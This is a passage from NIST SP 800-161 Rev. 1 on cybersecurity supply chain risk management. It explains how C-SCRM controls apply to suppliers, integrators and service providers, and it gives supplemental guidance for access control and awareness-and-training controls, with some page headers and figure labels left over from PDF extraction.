35 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
65
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
3. Evaluate the resulting set of controls and enhancements to determine whether all C-
SCRM concerns were addressed.
4. Develop additional controls currently undefined in [NIST SP 800-53, Rev. 5].
5. Identify controls for flow down to relevant sub-level contractors.
6. Assign applicable levels to each C-SCRM control.
7. Develop C-SCRM-specific supplemental guidance for each C-SCRM control.
Fig. A-1: C-SCRM Security Controls in NIST SP 800-161, Rev. 1
Note that [NIST SP 800-53, Rev. 5] provides C-SCRM-related controls and control families.
These controls may be listed in this publication with a summary or additional guidance and a
reference to the original [NIST SP 800-53, Rev. 5] control and supplemental guidance detail.
C-SCRM CONTROLS THROUGHOUT THE ENTERPRISE
As noted in Table A-1, C-SCRM controls in this publication are designated by the three levels
comprising the enterprise. This is to facilitate the selection of C-SCRM controls specific to
enterprises, their various missions, and individual systems, as described in Appendix C under the
Respond step of the risk management process. During controls selection, enterprises should use
the C-SCRM controls in this section to identify appropriate C-SCRM controls for tailoring per
risk assessment. By selecting and implementing applicable C-SCRM controls for each level,
enterprises will ensure that they have appropriately addressed C-SCRM.
APPLYING C-SCRM CONTROLS TO ACQUIRING PRODUCTS AND SERVICES
Acquirers may use C-SCRM controls as the basis from which to communicate their C-SCRM
requirements to different types of enterprises that provide products and services to acquirers,
including suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers. Acquirers should avoid using generalized requirements
statements, such as “ensure compliance with NIST SP 800-161, Rev. 1 controls.” Acquirers must
be careful to select the controls relevant to the specific use case of the service or product being
acquired. Acquirers are encouraged to integrate C-SCRM throughout their acquisition activities.
More detail on the role of C-SCRM in acquisition is provided in Section 3.1 of this document.
Extract NIST SP 800-53
Rev 5 Security Controls
Relevant to ICT SCRM
Add Supplemental
Guidance
Add New Controls
Control Title, Levels, and
Supplemental Guidance
Control family descripon,
individual controls tles and
descripons, and
supplemental guidance
OVERLAY
ENHANCED OVERLAY
APPENDIX A PROVIDES
Extract NIST SP 800-53
Rev 5 Security Controls
Relevant to C-SCRM
Add Supplemental
Guidance
Add New Controls
Control Title, Levels, and
Supplemental Guidance
Control family descripon,
individual controls tles and
descripons, and
supplemental guidance
OVERLAY
ENHANCED OVERLAY
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
66
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
It is important to recognize that the controls in this section do not provide specific contracting
language. Acquirers should use this publication as guidance to develop their own contracting
language with specific C-SCRM requirements for inclusion. The following sections expand upon
the supplier, developer, system integrator, external system service provider, and other ICT/OT-
related service provider roles with respect to C-SCRM expectations for acquirers.
Enterprises may use multiple techniques to ascertain whether these controls are in place, such as
supplier self-assessment, acquirer review, or third-party assessments for measurement and
adherence to the enterprise’s requirements. Enterprises should first look to established third-party
assessments to see if they meet their needs. When an enterprise defines C-SCRM requirements, it
may discover that established third-party assessments may not address all specific requirements.
In this case, additional evidence may be needed to justify unaddressed requirements. Please note
that the data obtained for this purpose should be appropriately protected.
SUPPLIERS
Suppliers may provide either commercial off-the-shelf (COTS) or, in federal contexts,
government off-the-shelf (GOTS) solutions to the acquirer. COTS solutions include non-
developmental items (NDI), such as commercially-licensed solutions/products. GOTS solutions
are government-only licensable solutions. Suppliers are a diverse group that ranges from very
small to large, specialized to diversified, and based in a single country to transnational. Suppliers
also range widely in their level of sophistication, resources, and transparency/visibility into their
processes and solutions.
Suppliers have diverse levels and types of C-SCRM practices in place. These practices and other
related practices may provide the requisite evidence for SCRM evaluation. An example of a
federal resource that may be leveraged is the Defense Microelectronics Activity (DMEA)
accreditation for trusted suppliers. When appropriate, allow suppliers the opportunity to reuse
any existing data and documentation that may provide evidence of C-SCRM implementation.
Enterprises should consider whether the cost of doing business with suppliers may be directly
impacted by the extent of supply chain cybersecurity requirements imposed on suppliers, the
willingness or ability of suppliers to allow visibility into how their products are developed or
manufactured, and how they apply security and supply chain practices to their solutions. When
enterprises or system integrators require greater levels of transparency from suppliers, they must
consider the possible cost implications of such requirements. Suppliers may opt not to participate
in procurements to avoid increased costs or perceived risks to their intellectual property, limiting
an enterprise’s supply or technology choices. Additionally, suppliers may face risks from
customers imposing multiple and different sets of supply chain cybersecurity requirements with
which the supplier must comply on a per-customer basis. The amount of transparency required
from suppliers should be commensurate to the suppliers’ criticality, which is sufficient to address
inherent risk.
DEVELOPERS AND MANUFACTURERS
Developers and manufactures are personnel that develop or manufacture systems, system
components (e.g., software), or system services (e.g., Application Programming Interfaces
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
67
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
[APIs]). Development can occur internally within enterprises or through external entities.
Developers typically maintain privileged access rights and play an essential role throughout the
SDLC. The activities they perform and the work they produce can either enhance security or
introduce new vulnerabilities. It is therefore essential that developers are both subject to and
intimately familiar with C-SCRM requirements and controls.
SYSTEM INTEGRATORS
System integrators provide customized services to the acquirer, including custom development,
test, operations, and maintenance. This group usually replies to a request for proposal from an
acquirer with a solution or service that is customized to the acquirer’s requirements. Such
proposals provided by system integrators can include many layers of suppliers and teaming
arrangements with other vendors or subcontractors. The system integrator should ensure that
these business entities are vetted and verified with respect to the acquirer’s C-SCRM
requirements. Because of the level of visibility that can be obtained in the relationship with the
system integrator, the acquirer has the discretion to require rigorous supplier acceptance criteria
and any relevant countermeasures to address identified or potential risks.
EXTERNAL SYSTEM SERVICE PROVIDERS OF INFORMATION SYSTEM SERVICES
Enterprises use external service providers to perform or support some of their mission and
business functions [NIST SP 800-53, Rev. 5]. The outsourcing of systems and services creates a
set of cybersecurity supply chain concerns that reduces the acquirer’s visibility into and control
of the outsourced functions. Therefore, it requires increased rigor from enterprises in defining C-
SCRM requirements, stating them in procurement agreements, monitoring delivered services,
and evaluating them for compliance with the stated requirements. Regardless of who performs
the services, the acquirer is ultimately responsible and accountable for the risk to the enterprise’s
systems and data that result from the use of these services. Enterprises should implement a set of
compensating C-SCRM controls to address this risk and work with the mission and business
process owner or risk executive to accept this risk. A variety of methods may be used to
communicate and subsequently verify and monitor C-SCRM requirements through such vehicles
as contracts, interagency agreements, lines of business arrangements, licensing agreements,
and/or supply chain transactions.
OTHER ICT/OT-RELATED SERVICE PROVIDERS
Providers of services can perform a wide range of different functions, ranging from consulting to
publishing website content to janitorial services. Other ICT/OT-related service providers
encompass those providers that require physical or logical access to ICT/OT or the use
technology (e.g., an aerial photographer using a drone to take video/pictures or a security firm
remotely monitoring a facility using cloud-based video surveillance) as a means of delivering
their service. As a result of service provider access or use, the potential for cyber supply chain
risk being introduced to the enterprise rises.
Operational technology possesses unique operational and security characteristics that necessitate
the application of specialized skills and capabilities to effectively protect them. Enterprises that
have significant OT components throughout their enterprise architecture often turn to specialized
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
68
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
service providers for the secure implementation and maintenance of these devices, systems, or
equipment. Any enterprise or individual providing services that may include authorized access to
an ICT or OT system should adhere to enterprise C-SCRM requirements. Enterprises should
apply special scrutiny to ICT/OT-related service providers managing mission-critical and/or
safety-relevant assets.
SELECTING, TAILORING, AND IMPLEMENTING C-SCRM SECURITY CONTROLS
The C-SCRM controls defined in this section should be selected and tailored according to
individual enterprise needs and environments using the guidance in [NIST SP 800-53, Rev. 5] in
order to ensure a cost-effective, risk-based approach to providing enterprise-wide C-SCRM. The
C-SCRM baseline defined in this publication addresses the basic needs of a broad and diverse set
of constituents. Enterprises must select, tailor, and implement the security controls based on: (i)
the environments in which enterprise information systems are acquired and operate; (ii) the
nature of operations conducted by enterprises; (iii) the types of threats facing enterprises, mission
and business processes, supply chains, and information systems; and (iv) the type of information
processed, stored, or transmitted by information systems and the supply chain infrastructure.
After selecting the initial set of security controls, the acquirer should initiate the tailoring process
according to NIST SP 800-53B, Control Baselines for Information Systems and Organization, in
order to appropriately modify and more closely align the selected controls with the specific
conditions within the enterprise. The tailoring should be coordinated with and approved by the
appropriate enterprise officials (e.g., authorizing officials, authorizing official designated
representatives, risk executive [function], chief information officers, or senior information
security officers) prior to implementing the C-SCRM controls. Additionally, enterprises have the
flexibility to perform the tailoring process at the enterprise level (either as the required tailored
baseline or as the starting point for policy-, program-, or system-specific tailoring) in support of
a specific program at the individual information system level or using a combination of
enterprise-level, program/mission-level, and system-specific approaches.
Selection and tailoring decisions, including the specific rationale for those decisions, should be
included within the C-SCRM documentation at Levels 1, 2, and 3 and Appendix C and approved
by the appropriate enterprise officials as part of the C-SCRM plan approval process.
C-SCRM CONTROL FORMAT
Table A-1 shows the format used in this publication for controls providing supplemental C-
SCRM guidance on existing [NIST SP 800-53, Rev. 5] controls or control enhancements.
C-SCRM controls that do not have a parent [NIST SP 800-53, Rev. 5] control generally follow
the format described in [NIST SP 800-53, Rev. 5] with the addition of relevant levels. New
controls are given identifiers consistent with [NIST SP 800-53, Rev. 5] but do not duplicate
existing control identifiers.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
69
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table A-1: C-SCRM Control Format
An example of the C-SCRM control format is shown below using C-SCRM Control AC-3 and
SCRM Control Enhancement AC-3(8):
AC-3
ACCESS ENFORCEMENT
Supplemental C-SCRM Guidance: Ensure that the information systems and the supply chain have
appropriate access enforcement mechanisms in place. This includes both physical and logical access
enforcement mechanisms, which likely work in coordination for supply chain needs. Enterprises should
ensure a detailed definition of access enforcement.
Level(s): 2, 3
Related Control(s): AC-4
Control Enhancement(s):
(8)
ACCESS ENFORCEMENT | REVOCATION OF ACCESS AUTHORIZATIONS
Supplemental C-SCRM Guidance: Prompt revocation is critical to ensure that suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers who
no longer require access or who abuse or violate their access privilege are not able to access an
enterprise’s system. For example, in a “badge flipping” situation, a contract is transferred from one
system integrator enterprise to another with the same personnel supporting the contract. In that
situation, the enterprise should disable the existing accounts, retire the old credentials, establish new
accounts, and issue completely new credentials.
Level(s): 2, 3
CONTROL
IDENTIFIER
CONTROL NAME
Supplemental C-SCRM Guidance:
Level(s):
Related Control(s):
Control Enhancement(s):
(1)
CONTROL NAME | CONTROL ENHANCEMENT NAME
Supplemental C-SCRM Guidance:
Level(s):
Related Control(s):
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
70
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
USING C-SCRM CONTROLS IN THIS PUBLICATION
The remainder of Section 4 provides the enhanced C-SCRM overlay of NIST SP 800-53, Rev. 5.
This section displays the relationship between NIST SP 800-53, Rev. 5 controls and C-SCRM
controls in one of the following ways:
• If a [NIST SP 800-53, Rev. 5] control or enhancement was determined to be an
information security control that serves as a foundational control for C-SCRM but is not
specific to C-SCRM, it is not included in this publication.
• If a [NIST SP 800-53, Rev. 5] control or enhancement was determined to be relevant to
C-SCRM, the levels in which the control applies are also provided.
• If a [NIST SP 800-53, Rev. 5] enhancement was determined to be relevant to C-SCRM
but the parent control was not, then the parent control number and title are included, but
there is no supplemental C-SCRM guidance.
• C-SCRM controls/enhancements that do not have an associated [NIST SP 800-53, Rev.
5] control/enhancement are listed with their titles and the control/enhancement text.
• All C-SCRM controls include the levels for which the control applies and supplemental
C-SCRM guidance as applicable.
• When a control enhancement provides a mechanism for implementing the C-SCRM
control, the control enhancement is listed within the Supplemental C-SCRM Guidance
and is not included separately.
• If [NIST SP 800-53, Rev. 5] already captures withdrawals or reorganization of prior
[NIST SP 800-161] controls, it is not included.
The following new controls and control enhancement have been added:
• The C-SCRM Control MA-8 – Maintenance Monitoring and Information Sharing is
added to the Maintenance control family
•
The C-SCRM Control SR-13 – Supplier Inventory is added to the Supply Chain Risk
Management control family
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
71
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
C-SCRM SECURITY CONTROLS
FAMILY: ACCESS CONTROL
[FIPS 200] specifies the Access Control minimum security requirement as follows:
Organizations must limit information system access to authorized users, processes
acting on behalf of authorized users, devices (including other information systems), and
the types of transactions and functions that authorized users are permitted to exercise.
Systems and components that traverse the supply chain are subject to access by a variety of
individuals and enterprises, including suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Such access should be defined
and managed to ensure that it does not inadvertently result in the unauthorized release,
modification, or destruction of information. This access should be limited to only the necessary
type, duration, and level of access for authorized enterprises (and authorized individuals within
those enterprises) and monitored for cybersecurity supply chain impact.
AC-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should specify and include in agreements (e.g., contracting
language) access control policies for their suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers that have access control policies. These should
include both physical and logical access to the supply chain and the information system. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors.
Level(s): 1, 2, 3
AC-2
ACCOUNT MANAGEMENT
Supplemental C-SCRM Guidance: Use of this control helps establish traceability of actions and actors in
the supply chain. This control also helps ensure access authorizations of actors in the supply chain is
appropriate on a continuous basis. The enterprise may choose to define a set of roles and associate a level
of authorization to ensure proper implementation. Enterprises must ensure that accounts for contractor
personnel do not exceed the period of performance of the contract. Privileged accounts should only be
established for appropriately vetted contractor personnel. Enterprises should also have processes in place to
establish and manage temporary or emergency accounts for contractor personnel that require access to a
mission-critical or mission-enabling system during a continuity or emergency event. For example, during a
pandemic event, existing contractor personnel who are not able to work due to illness may need to be
temporarily backfilled by new contractor staff. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
72
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
AC-3
ACCESS ENFORCEMENT
Supplemental C-SCRM Guidance: Ensure that the information systems and the supply chain have
appropriate access enforcement mechanisms in place. This includes both physical and logical access
enforcement mechanisms, which likely work in coordination for supply chain needs. Enterprises should
ensure that a defined consequence framework is in place to address access control violations. Enterprises
should require their prime contractors to implement this control and flow down this requirement to relevant
sub-tier contractors. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
ACCESS ENFORCEMENT | REVOCATION OF ACCESS AUTHORIZATIONS
Supplemental C-SCRM Guidance: Prompt revocation is critical to ensure that suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers who
no longer require access or who abuse or violate their access privilege are not able to access an
enterprise’s system. Enterprises should include in their agreements a requirement for contractors and
sub-tier contractors to immediately return access credentials (e.g., tokens, PIV or CAC cards, etc.) to
the enterprise. Enterprises must also have processes in place to promptly process the revocation of
access authorizations. For example, in a “badge flipping” situation, a contract is transferred from one
system integrator enterprise to another with the same personnel supporting the contract. In that
situation, the enterprise should disable the existing accounts, retire the old credentials, establish new
accounts, and issue completely new credentials.
Level(s): 2, 3
ACCESS ENFORCEMENT | CONTROLLED RELEASE
Supplemental C-SCRM Guidance: Information about the supply chain should be controlled for release
between the enterprise and third parties. Information may be exchanged between the enterprise and its
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers. The controlled release of enterprise information protects against risks associated
with disclosure.
Level(s): 2, 3
AC-4
INFORMATION FLOW ENFORCEMENT
Supplemental C- SCRM Guidance: Supply chain information may traverse a large supply chain to a broad
set of stakeholders, including the enterprise and its various federal stakeholders, suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers.
Specifying the requirements and how information flow is enforced should ensure that only the required
information is communicated to various participants in the supply chain. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
73
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Control Enhancement(s):
INFORMATION FLOW ENFORCEMENT | METADATA
Supplemental C-SCRM Guidance: The metadata relevant to C-SCRM is extensive and includes
activities within the SDLC. For example, information about systems and system components,
acquisition details, and delivery is considered metadata and may require appropriate protections.
Enterprises should identify what metadata is directly relevant to their supply chain security and ensure
that information flow enforcement is implemented in order to protect applicable metadata.
Level(s): 2, 3
INFORMATION FLOW ENFORCEMENT | DOMAIN AUTHENTICATION
Supplemental C-SCRM Guidance: Within the C-SCRM context, enterprises should specify various
source and destination points for information about the supply chain and information that flows
through the supply chain. This is so that enterprises have visibility of information flow within the
supply chain.
Level(s): 2, 3
INFORMATION FLOW ENFORCEMENT | VALIDATION OF METADATA
Supplemental C-SCRM Guidance: For C-SCRM, the validation of data and the relationship to its
metadata are critical. Much of the data transmitted through the supply chain is validated with the
verification of the associated metadata that is bound to it. Ensure that proper filtering and inspection is
put in place for validation before allowing payloads into the supply chain.
Level(s): 2, 3
INFORMATION FLOW ENFORCEMENT | PHYSICAL OR LOGICAL SEPARATION OF INFORMATION FLOWS
Supplemental C-SCRM Guidance: The enterprise should ensure the separation of the information
system and supply chain information36 flow. Various mechanisms can be implemented, such as
encryption methods (e.g., digital signing). Addressing information flow between the enterprise and its
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers may be challenging, especially when leveraging public networks.
Level(s): 3
AC-5
SEPARATION OF DUTIES
Supplemental C-SCRM Guidance: The enterprise should ensure that an appropriate separation of duties is
established for decisions that require the acquisition of both information system and supply chain
components. The separation of duties helps to ensure that adequate protections are in place for components
entering the enterprise’s supply chain, such as denying developers the privilege to promote code that they
wrote from development to production environments. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
36 Supply Chain Cybersecurity Risk Information is defined in the glossary of this document based on the Federal Acquisition Supply Chain
Security Act (FASCSA) definition for the term.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
74
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 2, 3
AC-6
LEAST PRIVILEGE
Supplemental C-SCRM Guidance: For C-SCRM supplemental guidance, see control enhancements.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Control Enhancement(s):
LEAST PRIVILEGE | PRIVILEGED ACCESS BY NON-ORGANIZATIONAL USERS
Supplemental C-SCRM Guidance: Enterprises should ensure that protections are in place to prevent
non-enterprise users from having privileged access to enterprise supply chain and related supply chain
information. When enterprise users include independent consultants, suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers, relevant
access requirements may need to use least privilege mechanisms to precisely define what information
and/or components are accessible, for what duration, at what frequency, using what access methods,
and by whom. Understanding what components are critical and non-critical can aid in understanding
the level of detail that may need to be defined regarding least privilege access for non-enterprise users.
Level(s): 2, 3
AC-17 REMOTE ACCESS
Supplemental C-SCRM Guidance: Ever more frequently, supply chains are accessed remotely. Whether for
the purpose of development, maintenance, or the operation of information systems, enterprises should
implement secure remote access mechanisms and allow remote access only to vetted personnel. Remote
access to an enterprise’s supply chain (including distributed software development environments) should be
limited to the enterprise or contractor personnel and only if and as required to perform their tasks. Remote
access requirements – such using a secure VPN, employing multi-factor authentication, or limiting access
to specified business hours or from specified geographic locations – must be properly defined in
agreements. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
REMOTE ACCESS | PROTECTION OF MECHANISM INFORMATION
Supplemental C-SCRM Guidance: Enterprises should ensure that detailed requirements are properly
defined and that access to information regarding the information system and supply chain is protected
from unauthorized use and disclosure. Since supply chain data and metadata disclosure or access can
have significant implications for an enterprise’s mission processes, appropriate measures must be taken
to vet both the supply chain and personnel processes to ensure that adequate protections are
implemented. Ensure that remote access to such information is included in requirements.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
75
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
AC-18 WIRELESS ACCESS
Supplemental C-SCRM Guidance: An enterprise’s supply chain may include wireless infrastructure that
supports supply chain logistics (e.g., radio-frequency identification device [RFID] support, software call
home features). Supply chain systems/components traverse the supply chain as they are moved from one
location to another, whether within the enterprise’s own environment or during delivery from system
integrators or suppliers. Ensuring that appropriate and secure access mechanisms are in place within this
supply chain enables the protection of the information systems and components, as well as logistics
technologies and metadata used during shipping (e.g., within tracking sensors). The enterprise should
explicitly define appropriate wireless access control mechanisms for the supply chain in policy and
implement appropriate mechanisms.
Level(s): 1, 2, 3
AC-19 ACCESS CONTROL FOR MOBILE DEVICES
Supplemental C-SCRM Guidance: The use of mobile devices (e.g., laptops, tablets, e-readers, smartphones,
smartwatches) has become common in the supply chain. They are used in direct support of an enterprise’s
operations, as well as tracking, supply chain logistics, data as information systems, and components that
traverse enterprise or systems integrator supply chains. Ensure that access control mechanisms are clearly
defined and implemented where relevant when managing enterprise supply chain components. An example
of such an implementation includes access control mechanisms implemented for use with remote handheld
units in RFID for tracking components that traverse the supply chain. Access control mechanisms should
also be implemented on any associated data and metadata tied to the devices.
Level(s): 2, 3
AC-20 USE OF EXTERNAL SYSTEMS
Supplemental C-SCRM Guidance: Enterprises’ external information systems include those of suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers. Unlike in an acquirer’s internal enterprise where direct and continuous monitoring is possible, in
the external supplier relationship, information may be shared on an as-needed basis and should be
articulated in an agreement. Access to the supply chain from such external information systems should be
monitored and audited. Enterprises should require their prime contractors to implement this control and
flow down this requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
Control Enhancement(s):
USE OF EXTERNAL SYSTEMS | LIMITS ON AUTHORIZED USE
Supplemental C-SCRM Guidance: This enhancement helps limit exposure of the supply chain to the
systems of suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers.
Level(s): 2, 3
USE OF EXTERNAL SYSTEMS | NON-ORGANIZATIONALLY OWNED SYSTEMS — RESTRICTED USE
Supplemental C-SCRM Guidance: Devices that do not belong to the enterprise (e.g., bring your own
device [BYOD] policies) increase the enterprise’s exposure to cybersecurity risks throughout the
supply chain. This includes devices used by suppliers, developers, system integrators, external system
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
76
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
service providers, and other ICT/OT-related service providers. Enterprises should review the use of
non-enterprise devices by non-enterprise personnel and make a risk-based decision as to whether it will
allow the use of such devices or furnish devices. Enterprises should furnish devices to those non-
enterprise personnel who present unacceptable levels of risk.
Level(s): 2, 3
AC-21 INFORMATION SHARING
Supplemental C-SCRM Guidance: Sharing information within the supply chain can help manage
cybersecurity risks throughout the supply chain. This information may include vulnerabilities, threats, the
criticality of systems and components, or delivery information. This information sharing should be
carefully managed to ensure that the information is only accessible to authorized individuals within the
enterprise’s supply chain. Enterprises should clearly define boundaries for information sharing with respect
to temporal, informational, contractual, security, access, system, and other requirements. Enterprises should
monitor and review for unintentional or intentional information sharing within its supply chain activities,
including information sharing with suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers.
Level(s): 1, 2
AC-22 PUBLICLY ACCESSIBLE CONTENT
Supplemental C-SCRM Guidance: Within the C-SCRM context, publicly accessible content may include
Requests for Information, Requests for Proposal, or information about delivery of systems and components.
This information should be reviewed to ensure that only appropriate content is released for public
consumption, whether alone or with other information.
Level(s): 2, 3
AC-23 DATA MINING PROTECTION
Supplemental C-SCRM Guidance: Enterprises should require their prime contractors to implement this
control as part of their insider threat activities and flow down this requirement to relevant sub-tier
contractors.
Level(s): 2, 3
AC-24 ACCESS CONTROL DECISIONS
Supplemental C-SCRM Guidance: Enterprises should assign access control decisions to support authorized
access to the supply chain. Ensure that if a system integrator or external service provider is used, there is
consistency in access control decision requirements and how the requirements are implemented. This may
require defining such requirements in service-level agreements, in many cases as part of the upfront
relationship established between the enterprise and system integrator or the enterprise and external service
provider. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
77
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: AWARENESS AND TRAINING
[FIPS 200] specifies the Awareness and Training minimum security requirement as follows:
Organizations must: (i) ensure that managers and users of organizational information
systems are made aware of the security risks associated with their activities and of the
applicable laws, Executive Orders, directives, policies, standards, instructions,
regulations, or procedures related to the security of organizational information systems;
and (ii) ensure that organizational personnel are adequately trained to carry out their
assigned information security-related duties and responsibilities.
This document expands the Awareness and Training control of [FIPS 200] to include C-SCRM.
Making the workforce aware of C-SCRM concerns is key to a successful C-SCRM strategy. C-
SCRM awareness and training provides understanding of the problem space and the appropriate
processes and controls that can help mitigate cybersecurity risks throughout the supply chain.
Enterprises should provide C-SCRM awareness and training to individuals at all levels within the
enterprise, including information security, procurement, enterprise risk management,
engineering, software development, IT, legal, HR, and others. Enterprises should also work with
suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers to ensure that the personnel who interact with an enterprise’s supply
chains receive C-SCRM awareness and training, as appropriate.
AT-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should designate a specific official to manage the
development, documentation, and dissemination of the training policy and procedures, including C-SCRM
and role-based specific training for those with supply chain responsibilities. Enterprises should integrate
cybersecurity supply chain risk management training and awareness into the security training and
awareness policy. C-SCRM training should target both the enterprise and its contractors. The policy should
ensure that supply chain cybersecurity role-based training is required for those individuals or functions that
touch or impact the supply chain, such as the information system owner, acquisition, supply chain logistics,
system engineering, program management, IT, quality, and incident response.
C-SCRM training procedures should address:
a.
Roles throughout the supply chain and system/element life cycle to limit the opportunities and
means available to individuals performing these roles that could result in adverse consequences,
b. Requirements for interaction between an enterprise’s personnel and individuals not employed by
the enterprise who participate in the supply chain throughout the SDLC, and
c.
Incorporating feedback and lessons learned from C-SCRM activities into the C-SCRM training.
Level(s): 1, 2
AT-2
LITERACY TRAINING AND AWARENESS
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in the control
enhancements. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
78
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Control Enhancements:
LITERACY TRAINING AND AWARENESS | PRACTICAL EXERCISES
Supplemental C-SCRM Guidance: Enterprises should provide practical exercises in literacy training
that simulate supply chain cybersecurity events and incidents. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-level contractors.
LITERACY TRAINING AND AWARENESS | INSIDER THREAT
Supplemental C-SCRM Guidance: Enterprises should provide literacy training on recognizing and
reporting potential indicators of insider threat within the supply chain. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors.
LITERACY TRAINING AND AWARENESS | SOCIAL ENGINEERING AND MINING
Supplemental C-SCRM Guidance: Enterprises should provide literacy training on recognizing and
reporting potential and actual instances of supply chain-related social engineering and social mining.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-level contractors.
LITERACY TRAINING AND AWARENESS | SUSPICIOUS COMMUNICATIONS AND ANOMALOUS
SYSTEM BEHAVIOR
Supplemental C-SCRM Guidance: Provide literacy training on recognizing suspicious communications
or anomalous behavior in enterprise supply chain systems. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-level contractors.
LITERACY TRAINING AND AWARENESS | ADVANCED PERSISTENT THREAT
Supplemental C-SCRM Guidance: Provide literacy training on recognizing suspicious communications
on an advanced persistent threat (APT) in the enterprise’s supply chain. Enterprises should require
their prime contractors to implement this control and flow down this requirement to relevant sub-level
contractors.
LITERACY TRAINING AND AWARENESS | CYBER THREAT ENVIRONMENT
Supplemental C-SCRM Guidance: Provide literacy training on cyber threats specific to the enterprise’s
supply chain environment. Enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-level contractors.
Level(s): 2
AT-3
ROLE-BASED TRAINING
Supplemental C-SCRM Guidance: Addressing cyber supply chain risks throughout the acquisition process
is essential to performing C-SCRM effectively. Personnel who are part of the acquisition workforce require
